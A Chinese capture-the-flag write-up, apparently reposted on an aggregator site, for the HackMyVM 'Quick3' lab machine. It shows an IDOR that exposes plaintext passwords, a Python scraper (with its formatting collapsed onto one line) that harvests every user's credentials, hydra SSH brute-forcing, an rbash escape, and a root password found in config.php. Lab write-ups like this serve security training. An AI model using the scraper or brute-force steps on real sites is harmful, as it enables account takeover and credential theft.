当前位置: 首页 > news >正文

HackMyVM-Quick3

简介

  • 靶场地址:
  • 难度:简单
    image

环境:
攻击机:kali 192.168.43.29
靶机:virtualbox 192.168.43.29

开始渗透

惯例,先用nmap扫一下开放的端口
image

  • 22 ssh服务
  • 80 http服务


    访问80端口的网页,简单浏览一下,在192.168.43.29/customer/这个地方存在一个登录口。
    我们把这点先记下来,看看还有没有其他可能的突破点。用dirsearch扫一下,没有发现隐藏的入口了。
    image
    那就从这个登录框开始:
  • 先用网页中暴露的一些几个邮箱试一下几个弱密码和sql注入万能密码,尝试能否登录。
  • 并没有什么进展,那么就直接创建一个账户,然后登录
    image
    成功进入后台页面
    image

进入右上角的 "My Profile",这个时候发现url里面出现了"?id=28",从而联想到了sql注入。
让sqlmap跑一下,没有发现注入
image
这个时候改变一下id的值,发现可以直接访问到别的用户的profile

  • 点击"change password"尝试看看能不能找到密码
  • 用F12查看一下,选中密码输入框,woc密码竟然在前端明文保存了,也就是说我们可以收集到每个用户对应的名字和密码,只需要写个爬虫脚本
    image

脚本就很简单了,让ai写一下就行,我放在下面了:

import requests
from bs4 import BeautifulSoup
import timedef scrape_web_pages():base_url = "http://192.168.43.29/customer/user.php?id="results = []headers = {'Host': '192.168.43.29','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','Accept-Language': 'zh-CN,zh;q=0.9','Cache-Control': 'no-cache','Upgrade-Insecure-Requests': '1','Accept-Encoding': 'gzip, deflate','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36','Cookie': 'PHPSESSID=qjsd3ob2selmuqh79a2hm4vn8q','Pragma': 'no-cache'}for page_id in range(1, 29):url = base_url + str(page_id)print(f"正在爬取页面 {page_id}/28: {url}")try:response = requests.get(url, headers=headers, timeout=10)response.raise_for_status()soup = BeautifulSoup(response.text, 'html.parser')contact_inner = soup.find(class_="contact_inner")oldpassword_input = soup.find('input', {'id': 'oldpassword', 'type': 'password'})contact_text = contact_inner.get_text(strip=True) if contact_inner else "未找到"password_value = oldpassword_input.get('value', "未找到") if oldpassword_input else "未找到"first_name = contact_text.split(':')[0].strip().split()[0].lower() if contact_text != "未找到" else "未找到"results.append(f"{first_name}:{password_value}")print(f"  - 成功获取: {contact_text}:{password_value}")except requests.exceptions.RequestException as e:print(f"  - 请求失败: {e}")results.append(f"页面{page_id}_请求失败=请求失败")time.sleep(0.5)return resultsdef save_results(results, filename="output.txt"):with open(filename, 'w', encoding='utf-8') as f:for line in results:f.write(line + '\n')print(f"\n结果已保存到 {filename}")if __name__ == "__main__":scraped_data = scrape_web_pages()save_results(scraped_data)

成功拿到对应名字和密码
image
因为还有一个ssh端口开着,又有了这么多用户名和对应的密码,自然是要去ssh爆破一下的
所以直接用hydra去ssh爆破一下
image
拿到用户名密码:

用户名:mike
密码:6G3UCx6aH6UYvJ6m

直接用finalshell去连接一下,拿到mike的shell,cat user.txt直接拿第一个flag
image


顺着思路传个linpeas上去看一下有没有可以提权的漏洞
image
这里扫到了一个CVE-2021-4034这个漏洞,尝试去利用一下,发现使用poc需要安装gcc,make等系统命令。
但是当我尝试去安装的时候,发现mike这个用户没有安装这些系统命令的权限,所以这条路就到头了qwq。
实在没有其他思路了,看了一下其他师傅的文章,发现要去访问config.php

image
原来如此,在config.php里面写了一个"root",后面的一串字符按照前面的经验来看应该就是密码
直接su root,输入密码,成功 getshell !!!!
image
cat root.txt拿flag,成功拿下了这个靶机
image

小TIP

这里刚拿到mike的shell的时候,发现怎么都cd不到其他目录,回显一个'rbash'
我们只需要输入一个bash,然后就能cd到其他目录了
image

靶机知识点

  • ssh爆破,这里推荐hydra
    还有一个难点可能就是代码编写,不过现在有了ai就很简单了
http://www.jsqmd.com/news/923876/

相关文章:

  • 3步掌握消息留存神器:RevokeMsgPatcher深度解析与实战指南
  • novel-downloader:终极跨站点小说下载器深度实战指南
  • 终极实战指南:如何用Arduino-IRremote库解决15种红外遥控协议兼容性问题
  • 论文写作高效落地:百考通AI全流程辅助功能实战解析
  • 免费开源AMD锐龙调试工具SMUDebugTool:释放处理器潜能的终极指南
  • 2026年2月衢州黄金回收实录:今日金价677元,警惕高价引流陷阱 - 黄金回收
  • 别再只调包了!用ResNet18/50在CIFAR-10上跑出第一个模型(环境配置+训练技巧避坑)
  • 盐城黄金回收实体店全解析:资质、鉴定、报价与上门服务 - 黄金回收
  • ROS2多机通讯实战:当WiFi局域网遇上虚拟机,如何用集中式发现协议绕过UDP组播限制?
  • 2026年4月质量好的焊管供应商推荐,对焊法兰/不锈钢无缝管/弯头/耐蚀合金无缝管/不锈钢法兰,焊管供货商哪家靠谱 - 品牌推荐师
  • 基于Arduino与超声波传感器的手势识别游戏机设计与实现
  • 电路设计从实验室到生活:创客实践与多元应用场景解析
  • 为什么Windows 10用户需要这个3步搞定OneDrive的卸载神器?
  • 绍兴金价高位变现攻略:上门回收实测6家机构,实时金价1300元/克 - 黄金回收
  • 告别调参炼丹!看VOYAGER如何用‘提示工程’在《我的世界》里从砍树到挖矿
  • SpringBoot整合Milvus向量数据库
  • 成都H型钢今日价格、价格行情、盛世钢联最新报价(2025年09月31日) - 四川盛世钢联营销中心
  • 从平面点云到清晰轮廓:结合RANSAC与AC方法,搞定复杂场景下的轮廓提取
  • 重磅上新:靠谱的气力输送设备制造商 - 品牌推广大师
  • 2026年5月盐城黄金回收实测:金价高位下各区变现实录 - 黄金回收
  • BotW存档管理器:跨平台存档转换与进度同步的终极解决方案
  • 2026年餐饮连锁酱料厂家深度测评:如何为你的餐饮连锁匹配最佳方案? - 资讯纵览
  • 2026衡水防水补漏公司怎么选?三家主流品牌实力全方位对比 - 吉修匠
  • TSP问题实战:对比模拟退火、遗传算法与禁忌搜索在Python中的表现与调参心得
  • Havenlon 产品哲学(三):为什么自动化系统需要独立授权层(Enigma Auth Key)
  • 2026河源贵金属奢侈品回收权威排行榜:金奢汇领衔,闲置变现不踩坑 - 小仙贝贝
  • RetroBar终极指南:在Windows 11上重温经典任务栏的完整教程
  • Android逆向分析的终极利器:Androguard完全指南
  • 2026年7月实测兰州黄金回收:6家门店比价,金价高位下谁更透明? - 黄金回收
  • 2026年7月长春黄金回收市场实测:金价高位下的变现选择 - 黄金回收